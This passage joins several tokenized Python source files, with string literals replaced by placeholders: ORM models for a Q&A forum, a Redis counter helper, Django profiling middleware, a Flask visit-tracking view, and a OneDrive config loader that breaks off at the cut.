) : <EOL> """<STR_LIT>""" <EOL> current_map = dict ( ( x . name , x ) for x in self . tags ) <EOL> currently_attached = set ( x . name for x in self . tags ) <EOL> new_tags = set ( tags ) <EOL> def lookup_tag ( name ) : <EOL> tag = Tag . query . filter_by ( locale = self . locale , <EOL> name = name ) . first ( ) <EOL> if tag is not None : <EOL> return tag <EOL> return Tag ( name , self . locale ) <EOL> for name in currently_attached . difference ( new_tags ) : <EOL> self . tags . remove ( current_map [ name ] ) <EOL> for name in new_tags . difference ( currently_attached ) : <EOL> self . tags . append ( lookup_tag ( name ) ) <EOL> def get_url_values ( self , action = None ) : <EOL> endpoint = '<STR_LIT>' if action == '<STR_LIT>' else '<STR_LIT>' <EOL> return endpoint , dict ( <EOL> lang_code = self . locale , <EOL> id = self . id , <EOL> slug = self . slug <EOL> ) <EOL> def _set_vote ( self , user , delta ) : <EOL> self . question . _set_vote ( user , delta ) <EOL> def _get_vote ( self , user ) : <EOL> self . question . _get_vote ( user ) <EOL> @ property <EOL> def is_answered ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . answer_post_id is not None or self . answer is not None <EOL> def sync_counts ( self ) : <EOL> """<STR_LIT>""" <EOL> self . votes = self . question . votes <EOL> self . reply_count = Post . filter_by ( topic = self ) . count ( ) - <NUM_LIT:1> <EOL> def _update_hotness ( self ) : <EOL> """<STR_LIT>""" <EOL> delta = self . date - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> secs = ( delta . days * <NUM_LIT> + delta . seconds + <EOL> ( delta . microseconds / <NUM_LIT> ) ) - <NUM_LIT> <EOL> order = log ( max ( abs ( self . votes ) , <NUM_LIT:1> ) , <NUM_LIT:10> ) <EOL> sign = <NUM_LIT:1> if self . votes > <NUM_LIT:0> else - <NUM_LIT:1> if self . votes < <NUM_LIT:0> else <NUM_LIT:0> <EOL> self . hotness = round ( order + sign * secs / <NUM_LIT> , <NUM_LIT:7> ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . title , self . locale , self . votes ) <EOL> class Post ( RemoteObject , TextRendererMixin ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> remote_object_type = '<STR_LIT>' <EOL> public_fields = ( '<STR_LIT:id>' , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:text>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , topic , author , text , date = None , is_reply = True ) : <EOL> self . topic = topic <EOL> self . author = author <EOL> self . editor = None <EOL> self . text = text <EOL> self . is_deleted = False <EOL> self . is_answer = False <EOL> self . is_question = not is_reply <EOL> if date is None : <EOL> date = datetime . utcnow ( ) <EOL> topic . last_change = self . updated = self . created = date <EOL> self . votes = <NUM_LIT:0> <EOL> self . edits = <NUM_LIT:0> <EOL> self . comment_count = <NUM_LIT:0> <EOL> author . touch_activity ( topic . locale , <NUM_LIT:50> ) <EOL> session . add ( self ) <EOL> if not is_reply : <EOL> try_award ( '<STR_LIT>' , author , self ) <EOL> @ property <EOL> def guid ( self ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' % ( <EOL> settings . TAG_AUTHORITY , <EOL> self . created . strftime ( '<STR_LIT>' ) , <EOL> self . id <EOL> ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_deleted : <EOL> return <EOL> if self . is_question : <EOL> self . topic . is_deleted = True <EOL> for tag in self . topic . tags : <EOL> atomic_add ( tag , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> else : <EOL> atomic_add ( self . topic , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> self . is_deleted = True <EOL> def restore ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_deleted : <EOL> return <EOL> if self . is_question : <EOL> self . topic . is_deleted = False <EOL> for tag in self . topic . tags : <EOL> atomic_add ( tag , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> else : <EOL> atomic_add ( self . topic , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . is_deleted = False <EOL> @ property <EOL> def was_edited ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . editor_id is not None <EOL> def get_url_values ( self , action = None ) : <EOL> """<STR_LIT>""" <EOL> if action is not None : <EOL> assert action in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return '<STR_LIT>' % action , { <EOL> '<STR_LIT>' : self . topic . locale , <EOL> '<STR_LIT:id>' : self . id <EOL> } <EOL> if self . is_question : <EOL> return self . topic . get_url_values ( ) <EOL> endpoint , args = self . topic . get_url_values ( ) <EOL> if not self . is_question : <EOL> args [ '<STR_LIT>' ] = '<STR_LIT>' % self . id <EOL> return endpoint , args <EOL> def edit ( self , new_text , editor = None , date = None ) : <EOL> """<STR_LIT>""" <EOL> if editor is None : <EOL> editor = self . author <EOL> if date is None : <EOL> date = datetime . utcnow ( ) <EOL> PostRevision ( self ) <EOL> self . text = new_text <EOL> self . editor = editor <EOL> self . updated = self . topic . last_change = date <EOL> self . topic . _update_hotness ( ) <EOL> atomic_add ( self , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try_award ( '<STR_LIT>' , editor , self ) <EOL> editor . touch_activity ( self . topic . locale , <NUM_LIT:20> ) <EOL> def get_revision ( self , id ) : <EOL> """<STR_LIT>""" <EOL> entry = PostRevision . query . get ( id ) <EOL> if entry is not None and entry . post == self : <EOL> return entry <EOL> def _revert_vote ( self , vote , user ) : <EOL> atomic_add ( self , '<STR_LIT>' , - vote . delta ) <EOL> if vote . delta > <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> if self . is_question : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> else : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> elif vote . delta < <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> if user != self . author : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> atomic_add ( user , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> def _set_vote ( self , user , delta ) : <EOL> """<STR_LIT>""" <EOL> assert delta in ( <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> ) , '<STR_LIT>' <EOL> vote = _Vote . query . filter_by ( user = user , post = self ) . first ( ) <EOL> if delta == <NUM_LIT:0> : <EOL> if vote : <EOL> session . delete ( vote ) <EOL> self . _revert_vote ( vote , user ) <EOL> else : <EOL> if vote is None : <EOL> vote = _Vote ( user , self , delta ) <EOL> else : <EOL> self . _revert_vote ( vote , user ) <EOL> vote . delta = delta <EOL> atomic_add ( self , '<STR_LIT>' , delta , expire = True ) <EOL> topic = Topic . query . filter_by ( question = self ) . first ( ) <EOL> if topic is not None : <EOL> topic . votes = self . votes <EOL> if delta > <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> if self . is_question : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> else : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> elif delta < <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> if self . author != user : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> atomic_add ( user , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> if not hasattr ( user , '<STR_LIT>' ) : <EOL> user . _vote_cache = { } <EOL> user . _vote_cache [ self . id ] = delta <EOL> if self . is_question : <EOL> self . topic . _update_hotness ( ) <EOL> user . touch_activity ( self . topic . locale , <NUM_LIT:1> ) <EOL> try_award ( '<STR_LIT>' , user , self , delta ) <EOL> def _get_vote ( self , user ) : <EOL> """<STR_LIT>""" <EOL> cache = getattr ( user , '<STR_LIT>' , None ) <EOL> if cache is None : <EOL> user . _vote_cache = { } <EOL> cacheval = user . _vote_cache . get ( self . id ) <EOL> if cacheval is None : <EOL> vote = _Vote . query . filter_by ( user = user , post = self ) . first ( ) <EOL> if vote is None : <EOL> cacheval = <NUM_LIT:0> <EOL> else : <EOL> cacheval = vote . delta <EOL> user . _vote_cache [ self . id ] = cacheval <EOL> return cacheval <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> repr ( self . author . username ) , <EOL> self . updated . strftime ( '<STR_LIT>' ) , <EOL> self . votes <EOL> ) <EOL> class Comment ( TextRendererMixin ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> render_text_inline = True <EOL> def __init__ ( self , post , author , text , date = None ) : <EOL> if date is None : <EOL> date = datetime . utcnow ( ) <EOL> self . post = post <EOL> self . author = author <EOL> self . date = date <EOL> self . text = text <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . id , <EOL> self . author . username , <EOL> self . post_id <EOL> ) <EOL> class _Vote ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , user , post , delta = <NUM_LIT:1> ) : <EOL> self . user = user <EOL> self . post = post <EOL> self . delta = delta <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . delta , <EOL> self . user . username , <EOL> self . post_id <EOL> ) <EOL> class _UserActivity ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , user , locale ) : <EOL> self . user = user <EOL> self . locale = Locale . parse ( locale ) <EOL> self . counter = <NUM_LIT:0> <EOL> self . first_activity = self . last_activity = datetime . utcnow ( ) <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . user . username , <EOL> self . locale , <EOL> self . counter <EOL> ) <EOL> class _OpenIDUserMapping ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , identity_url ) : <EOL> self . identity_url = identity_url <EOL> session . add ( self ) <EOL> class PostRevision ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , post ) : <EOL> self . post = post <EOL> self . editor = post . editor or post . author <EOL> self . date = post . updated <EOL> self . text = post . text <EOL> session . add ( self ) <EOL> def restore ( self ) : <EOL> """<STR_LIT>""" <EOL> self . post . edit ( self . text , self . editor , self . date ) <EOL> @ property <EOL> def rendered_text ( self ) : <EOL> """<STR_LIT>""" <EOL> return format_creole ( self . text ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . id , <EOL> self . editor . username , <EOL> self . post_id <EOL> ) <EOL> class Tag ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , name , locale ) : <EOL> self . name = name <EOL> self . locale = Locale . parse ( locale ) <EOL> self . tagged = <NUM_LIT:0> <EOL> session . add ( self ) <EOL> @ property <EOL> def size ( self ) : <EOL> return <NUM_LIT:100> + log ( self . tagged or <NUM_LIT:1> ) * <NUM_LIT:20> <EOL> def get_url_values ( self ) : <EOL> return '<STR_LIT>' , dict ( <EOL> name = self . name , <EOL> lang_code = self . locale <EOL> ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . name , self . locale ) <EOL> class UserBadge ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , badge , payload = None ) : <EOL> self . badge = badge <EOL> self . awarded = datetime . utcnow ( ) <EOL> self . payload = payload <EOL> class BadgeExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def count_badges ( self , user , badgeiter ) : <EOL> user . bronce_badges = user . silver_badges = user . gold_badges = user . platin_badges = <NUM_LIT:0> <EOL> for badge in badgeiter : <EOL> if badge : <EOL> attr = badge . level + '<STR_LIT>' <EOL> setattr ( user , attr , getattr ( user , attr , <NUM_LIT:0> ) + <NUM_LIT:1> ) <EOL> def append ( self , state , value , initiator ) : <EOL> user = state . obj ( ) <EOL> self . count_badges ( user , chain ( user . badges , [ value . badge ] ) ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> user = state . obj ( ) <EOL> badges = set ( user . badges ) <EOL> badges . discard ( value . badge ) <EOL> self . count_badges ( user , badges ) <EOL> return value <EOL> class ReplyCollectionExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def append ( self , state , value , initiator ) : <EOL> atomic_add ( state . obj ( ) , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> atomic_add ( state . obj ( ) , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> return value <EOL> class CommentCounterExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def append ( self , state , value , initiator ) : <EOL> atomic_add ( state . obj ( ) , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> atomic_add ( state . obj ( ) , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> return value <EOL> class TagCounterExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def append ( self , state , value , initiator ) : <EOL> atomic_add ( value , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> atomic_add ( value , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> return value <EOL> mapper ( User , users , properties = dict ( <EOL> id = users . c . user_id <EOL> ) ) <EOL> mapper ( _UserActivity , user_activities , properties = dict ( <EOL> id = user_activities . c . activity_id , <EOL> user = relation ( User ) <EOL> ) ) <EOL> mapper ( UserBadge , user_badges , properties = dict ( <EOL> id = user_badges . c . badge_id , <EOL> user = relation ( User , backref = backref ( '<STR_LIT>' , extension = BadgeExtension ( ) ) ) <EOL> ) ) <EOL> mapper ( UserMessage , user_messages , properties = dict ( <EOL> id = user_messages . c . message_id , <EOL> user = relation ( User ) <EOL> ) ) <EOL> mapper ( Post , posts , properties = dict ( <EOL> id = posts . c . post_id , <EOL> author = relation ( User , primaryjoin = posts . c . author_id == users . c . user_id ) , <EOL> editor = relation ( User , primaryjoin = posts . c . editor_id == users . c . user_id ) , <EOL> comments = relation ( Comment , backref = '<STR_LIT>' , <EOL> extension = CommentCounterExtension ( ) , <EOL> order_by = [ comments . c . date ] ) , <EOL> text = synonym ( '<STR_LIT>' , map_column = True ) <EOL> ) ) <EOL> mapper ( Topic , topics , properties = dict ( <EOL> id = topics . c . topic_id , <EOL> author = relation ( User , primaryjoin = <EOL> topics . c . author_id == users . c . user_id ) , <EOL> answer_author = relation ( User , primaryjoin = <EOL> topics . c . answer_author_id == users . c . user_id ) , <EOL> question = relation ( Post , primaryjoin = <EOL> topics . c . question_post_id == posts . c . post_id , <EOL> post_update = True ) , <EOL> answer = relation ( Post , primaryjoin = <EOL> topics . c . answer_post_id == posts . c . post_id , <EOL> post_update = True ) , <EOL> posts = relation ( Post , primaryjoin = <EOL> posts . c . topic_id == topics . c . topic_id , <EOL> order_by = [ posts . c . is_answer . desc ( ) , <EOL> posts . c . votes . desc ( ) ] , <EOL> backref = backref ( '<STR_LIT>' , post_update = True ) , <EOL> extension = ReplyCollectionExtension ( ) ) , <EOL> tags = relation ( Tag , secondary = topic_tags , order_by = [ tags . c . name ] , <EOL> lazy = False , extension = TagCounterExtension ( ) ) <EOL> ) , order_by = [ topics . c . last_change . desc ( ) ] ) <EOL> mapper ( Comment , comments , properties = dict ( <EOL> author = relation ( User ) , <EOL> text = synonym ( '<STR_LIT>' , map_column = True ) <EOL> ) ) <EOL> mapper ( Tag , tags , properties = dict ( <EOL> id = tags . c . tag_id , <EOL> topics = dynamic_loader ( Topic , secondary = topic_tags , <EOL> query_class = TopicQuery ) <EOL> ) ) <EOL> mapper ( _Vote , votes , properties = dict ( <EOL> user = relation ( User ) , <EOL> post = relation ( Post ) <EOL> ) , primary_key = [ votes . c . user_id , votes . c . post_id ] ) <EOL> mapper ( _OpenIDUserMapping , openid_user_mapping , properties = dict ( <EOL> user = relation ( User , lazy = False , backref = backref ( '<STR_LIT>' , lazy = True , <EOL> collection_class = set ) ) <EOL> ) ) <EOL> mapper ( PostRevision , post_revisions , properties = dict ( <EOL> id = post_revisions . c . revision_id , <EOL> post = relation ( Post , backref = backref ( '<STR_LIT>' , lazy = '<STR_LIT>' ) ) , <EOL> editor = relation ( User ) <EOL> ) ) <EOL> from solace . utils . support import slugify <EOL> from solace . badges import try_award </s>
<s> from django . conf import settings <EOL> from django . utils . functional import cached_property <EOL> import redis <EOL> from redis . sentinel import Sentinel <EOL> from redis . exceptions import ConnectionError , ResponseError <EOL> COUNTER_CACHE_KEY = '<STR_LIT>' <EOL> COUNTER_FREQ_CACHE_KEY = '<STR_LIT>' <EOL> class Counters ( object ) : <EOL> @ cached_property <EOL> def _redis ( self ) : <EOL> if getattr ( settings , '<STR_LIT>' , None ) : <EOL> sentinel = Sentinel ( settings . EXPERIMENTS_REDIS_SENTINELS , socket_timeout = settings . EXPERIMENTS_REDIS_SENTINELS_TIMEOUT ) <EOL> host , port = sentinel . discover_master ( settings . EXPERIMENTS_REDIS_MASTER_NAME ) <EOL> else : <EOL> host = getattr ( settings , '<STR_LIT>' , '<STR_LIT:localhost>' ) <EOL> port = getattr ( settings , '<STR_LIT>' , <NUM_LIT> ) <EOL> password = getattr ( settings , '<STR_LIT>' , None ) <EOL> db = getattr ( settings , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> return redis . Redis ( host = host , port = port , password = password , db = db ) <EOL> def increment ( self , key , participant_identifier , count = <NUM_LIT:1> ) : <EOL> if count == <NUM_LIT:0> : <EOL> return <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> new_value = self . _redis . hincrby ( cache_key , participant_identifier , count ) <EOL> if new_value > count : <EOL> self . _redis . hincrby ( freq_cache_key , new_value - count , - <NUM_LIT:1> ) <EOL> self . _redis . hincrby ( freq_cache_key , new_value , <NUM_LIT:1> ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> pass <EOL> def clear ( self , key , participant_identifier ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> pipe = self . _redis . pipeline ( ) <EOL> freq , _ = pipe . hget ( cache_key , participant_identifier ) . hdel ( cache_key , participant_identifier ) . execute ( ) <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> self . _redis . hincrby ( freq_cache_key , freq , - <NUM_LIT:1> ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> pass <EOL> def get ( self , key ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> return self . _redis . hlen ( cache_key ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> return <NUM_LIT:0> <EOL> def get_frequency ( self , key , participant_identifier ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> freq = self . _redis . hget ( cache_key , participant_identifier ) <EOL> return int ( freq ) if freq else <NUM_LIT:0> <EOL> except ( ConnectionError , ResponseError ) : <EOL> return <NUM_LIT:0> <EOL> def get_frequencies ( self , key ) : <EOL> try : <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> return dict ( ( int ( k ) , int ( v ) ) for ( k , v ) in self . _redis . hgetall ( freq_cache_key ) . items ( ) if int ( v ) > <NUM_LIT:0> ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> return tuple ( ) <EOL> def reset ( self , key ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> self . _redis . delete ( cache_key ) <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> self . _redis . delete ( freq_cache_key ) <EOL> return True <EOL> except ( ConnectionError , ResponseError ) : <EOL> return False <EOL> def reset_pattern ( self , pattern_key ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % pattern_key <EOL> for key in self . _redis . keys ( cache_key ) : <EOL> self . _redis . delete ( key ) <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % pattern_key <EOL> for key in self . _redis . keys ( freq_cache_key ) : <EOL> self . _redis . delete ( key ) <EOL> return True <EOL> except ( ConnectionError , ResponseError ) : <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from django . conf import settings <EOL> from django . core . signals import request_started , request_finished <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . encoding import smart_unicode , smart_str <EOL> from speedbar . signals import setup_request_tracing , store_request_trace <EOL> from speedbar . utils import init_modules <EOL> from speedbar . modules . base import RequestTrace <EOL> if getattr ( settings , '<STR_LIT>' , True ) : <EOL> init_modules ( ) <EOL> request_started . connect ( setup_request_tracing , dispatch_uid = '<STR_LIT>' ) <EOL> request_finished . connect ( store_request_trace , dispatch_uid = '<STR_LIT>' ) <EOL> HTML_TYPES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> METRIC_PLACEHOLDER_RE = re . compile ( '<STR_LIT>' ) <EOL> class SpeedbarMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> if getattr ( settings , '<STR_LIT>' , True ) : <EOL> request_trace = RequestTrace . instance ( ) <EOL> request_trace . stacktracer . root . label = '<STR_LIT>' % ( request . method , request . path ) <EOL> request_trace . request = request <EOL> def process_response ( self , request , response ) : <EOL> if not getattr ( settings , '<STR_LIT>' , True ) : <EOL> return response <EOL> request_trace = RequestTrace . instance ( ) <EOL> request_trace . response = response <EOL> metrics = dict ( ( key , module . get_metrics ( ) ) for key , module in request_trace . modules . items ( ) ) <EOL> if self . should_return_response_headers ( request ) : <EOL> self . add_response_headers ( response , metrics ) <EOL> if self . should_return_trace_header ( request ) : <EOL> response [ '<STR_LIT>' ] = reverse ( '<STR_LIT>' , args = [ request_trace . id ] ) <EOL> request_trace . persist_log = True <EOL> if self . should_replace_template_tags ( request ) : <EOL> if '<STR_LIT>' not in response . get ( '<STR_LIT>' , '<STR_LIT>' ) and response . get ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) . split ( '<STR_LIT:;>' ) [ <NUM_LIT:0> ] in HTML_TYPES : <EOL> if hasattr ( response , '<STR_LIT>' ) : <EOL> response . render ( ) <EOL> content = smart_unicode ( response . content ) <EOL> content = self . replace_templatetag_placeholders ( content , metrics ) <EOL> if getattr ( settings , '<STR_LIT>' , True ) : <EOL> panel_url = reverse ( '<STR_LIT>' , args = [ request_trace . id ] ) <EOL> panel_placeholder_url = reverse ( '<STR_LIT>' ) <EOL> content = content . replace ( panel_placeholder_url , panel_url ) <EOL> request_trace . persist_details = True <EOL> response . content = smart_str ( content ) <EOL> if response . get ( '<STR_LIT>' , None ) : <EOL> response [ '<STR_LIT>' ] = len ( response . content ) <EOL> return response <EOL> def should_return_response_headers ( self , request ) : <EOL> return getattr ( settings , '<STR_LIT>' , False ) <EOL> def should_return_trace_header ( self , request ) : <EOL> return hasattr ( request , '<STR_LIT:user>' ) and request . user . is_staff and getattr ( settings , '<STR_LIT>' , True ) <EOL> def should_replace_template_tags ( self , request ) : <EOL> return hasattr ( request , '<STR_LIT:user>' ) and request . user . is_staff <EOL> def add_response_headers ( self , response , metrics ) : <EOL> """<STR_LIT>""" <EOL> def sanitize ( string ) : <EOL> return string . title ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:->' ) <EOL> for module , module_values in metrics . items ( ) : <EOL> for key , value in module_values . items ( ) : <EOL> response [ '<STR_LIT>' % ( sanitize ( module ) , sanitize ( key ) ) ] = value <EOL> def replace_templatetag_placeholders ( self , content , metrics ) : <EOL> """<STR_LIT>""" <EOL> def replace_placeholder ( match ) : <EOL> module = match . group ( '<STR_LIT>' ) <EOL> metric = match . group ( '<STR_LIT>' ) <EOL> return unicode ( metrics [ module ] [ metric ] ) <EOL> return METRIC_PLACEHOLDER_RE . sub ( replace_placeholder , content ) </s>
<s> def check_args ( args , options ) : <EOL> for key in options [ "<STR_LIT>" ] : <EOL> if not args . has_key ( key ) : <EOL> raise MaglicaCliException , options <EOL> return True <EOL> class MaglicaCliException ( Exception ) : <EOL> pass </s>
<s> from flask import Blueprint , Response , render_template , flash , redirect , session , url_for , request , g <EOL> from flask . ext . login import current_user , login_required <EOL> from app import app , db , login_manager <EOL> from app . tracking . models import Site , Visit <EOL> from app . tracking . forms import RegisterSiteForm <EOL> from datetime import datetime <EOL> from app . tracking . geodata import get_geodata <EOL> from app . tracking . decorators import crossdomain <EOL> mod = Blueprint ( '<STR_LIT>' , __name__ ) <EOL> @ mod . route ( '<STR_LIT>' , methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' ) ) <EOL> @ login_required <EOL> def sites_view ( ) : <EOL> form = RegisterSiteForm ( request . form ) <EOL> sites = current_user . sites . all ( ) <EOL> if form . validate_on_submit ( ) : <EOL> site = Site ( ) <EOL> form . populate_obj ( site ) <EOL> site . user_id = current_user . id <EOL> db . session . add ( site ) <EOL> db . session . commit ( ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> return render_template ( '<STR_LIT>' , form = form , sites = sites ) <EOL> @ mod . route ( '<STR_LIT>' , methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' ) ) <EOL> @ crossdomain ( origin = "<STR_LIT:*>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT>" ] , headers = "<STR_LIT>" , max_age = "<STR_LIT>" ) <EOL> def register_visit ( site_id ) : <EOL> site = Site . get_by_id ( site_id ) <EOL> if site : <EOL> browser = request . headers . get ( '<STR_LIT>' ) <EOL> date = datetime . now ( ) <EOL> event = request . args . get ( '<STR_LIT>' ) <EOL> url = request . url <EOL> ip_address = request . remote_addr <EOL> geo = get_geodata ( ip_address ) <EOL> location_full = "<STR_LIT:U+002CU+0020>" . join ( [ geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] ] ) <EOL> location = "<STR_LIT:U+002CU+0020>" . join ( [ geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] ] ) <EOL> visit = Visit ( browser , date , event , url , ip_address , location_full , location ) <EOL> visit . site_id = site_id <EOL> db . session . add ( visit ) <EOL> db . session . commit ( ) <EOL> return Response ( "<STR_LIT>" , content_type = "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from client import Service </s>
<s> from __future__ import unicode_literals , print_function <EOL> import itertools as it , operator as op , functools as ft <EOL> import os , sys , io , errno , tempfile , stat , re <EOL> from os . path import dirname , basename <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> class ConfigMixin ( object ) : <EOL> conf_path_default = b'<STR_LIT>' <EOL> conf_save = False <EOL> conf_raise_structure_errors = False <EOL> conf_update_keys = dict ( <EOL> client = { '<STR_LIT:id>' , '<STR_LIT>' } , <EOL> auth = { '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } , <EOL> request = { '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } ) <EOL> def __init__ ( self , ** kwz ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def from_conf ( cls , path = None , ** overrides ) : <EOL> '''<STR_LIT>''' <EOL> from onedrive import portalocker <EOL> import yaml <EOL> if path is None : <EOL> path = cls . conf_path_default <EOL> log . debug ( '<STR_LIT>' , path ) <EOL> path = os . path . expanduser ( path ) <EOL> with open ( path , '<STR_LIT:rb>' ) as src : <EOL> portalocker . lock ( src , portalocker . LOCK_SH ) <EOL> yaml_str = src . read ( ) <EOL> portalocker . unlock ( src ) <EOL> conf = yaml . safe_load ( yaml_str ) <EOL> conf . setdefault ( '<STR_LIT>' , path ) <EOL> conf_cls = dict ( ) <EOL> for ns , keys in cls . conf_update_keys . viewitems ( ) : <EOL> for k in keys : <EOL> try : <EOL> v = conf . get ( ns , dict ( ) ) . get ( k ) <EOL> except AttributeError : <EOL> if not cls . conf_raise_structure_errors : raise <EOL> raise KeyError ( ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( ns = ns , k = k , path = path ) ) <EOL> if v is not None : conf_cls [ '<STR_LIT>' . format ( ns , k ) ] = conf [ ns ] [ k ] <EOL> conf_cls . update ( overrides ) <EOL> if isinstance ( conf . get ( '<STR_LIT>' , dict ( ) ) . get ( '<STR_LIT:id>' ) , ( int , long ) ) : <EOL> log . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , path ) <EOL> cid = conf [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> if not re . search ( r'<STR_LIT>' . format ( cid ) , yaml_str ) and re . search ( r'<STR_LIT>' . format ( cid ) , yaml_str ) : <EOL> cid = int ( '<STR_LIT>' . format ( cid ) ) <EOL> conf [ 